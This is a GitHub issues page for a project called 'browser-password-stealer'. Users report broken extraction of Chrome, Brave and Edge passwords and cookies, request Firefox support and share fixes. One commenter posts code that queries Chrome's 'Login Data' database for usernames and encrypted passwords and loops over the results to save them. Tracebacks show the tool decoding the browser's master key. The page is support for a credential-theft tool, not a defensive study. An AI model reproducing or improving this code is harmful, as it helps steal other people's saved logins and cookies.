henry-richard7 / browser-password-stealer Goto Github PK

I think Chrome had an update for their cookies
Your script doesnt work anymore

you better fix that

Thank you for the work done. Can Firefox be added to the list?

Where is config.ini?

Can be fixed by adding , newline='', encoding="utf-8"

I'm not python guy so i'd like if u check if by yourself and if everything is ok then add this fix.
If this fix is not needed, then u may close the issue.

Traceback (most recent call last):
File "C:\Users\0x00\Desktop\Project1.py", line 414, in
StealBrave()
File "C:\Users\0x00\Desktop\Project1.py", line 212, in StealBrave
master_key = get_master_key()
File "C:\Users\0x00\Desktop\Project1.py", line 116, in get_master_key
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
TypeError: string indices must be integers

Help?

Interesting cybersecurity project !

However the cookies format is unknown, it's neither Netscape or JSON

How to load them or convert them into those formats?

Could you add Firefox in the list of supported browsers

Also for Chrome and Edge it only grabs Admin profile, not all the other profiles

When trying to run it i get the errors Unresolved reference 'AES' and Unresolved reference 'Crypto'

can i get some help with this?

`# pip -V

pip 23.2 from /usr/lib/python3/dist-packages/pip (python 3.11)`

Traceback (most recent call last):
File "C:\tools\tools\check_passwd\Browser-password-stealer-master\chromium_based_browsers.py", line 152, in
data = get_data(browser_path, "Default", master_key, data_type)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\tools\tools\check_passwd\Browser-password-stealer-master\chromium_based_browsers.py", line 109, in get_data
shutil.copy(db_file, 'temp_db')
File "C:\Program Files (x86)\Lib\shutil.py", line 419, in copy
copyfile(src, dst, follow_symlinks=follow_symlinks)
File "C:\Program Files (x86)\Lib\shutil.py", line 256, in copyfile
with open(src, 'rb') as fsrc:

(I don't use github btw so I'm not sure if this is the right way of doing this)

I noticed that your script when taking passwords used "action_urls" to recieve the password's login website. However I also noticed that this can sometimes return "" which ain't what you want to see 😅. So I just modified it to use origin urls (and action urls) because I noticed it returns the URL more often.
Here's the updated code: (idk how to attach files so this is gonna be messy sorry. )

Changed to: (this just fixes the bug of not have admin to access the file)

for data_type_name, data_type in data_queries.items():
            print(f"\t [$] Getting {data_type_name.replace('_', ' ').capitalize()}")
            try:
                data = get_data(browser_path, "Default", master_key, data_type)
                save_results(browser, data_type_name, data)
            except:
                print('\t [!] Failed to receive data')
            print("\t------\n")`

Changed to: (this is the updated query, ik it was a surprisingly simple fix, you made your code very well/easy to change 👍)

data_queries = {
    'login_data': {
        'query': 'SELECT origin_url, action_url, username_value, password_value FROM logins',
        'file': '\\Login Data',
        'columns': ['Origin URL', 'Action URL', 'Email', 'Password'],
        'decrypt': True
    },
...

Hope that helps! And sorry if this is a messy way of trying to help your project 😅

https://github.com/me-rgb/Fix-for-https-github.com-henry-richard7-Browser-password-stealer

The scripts doesn't work on Microsoft edge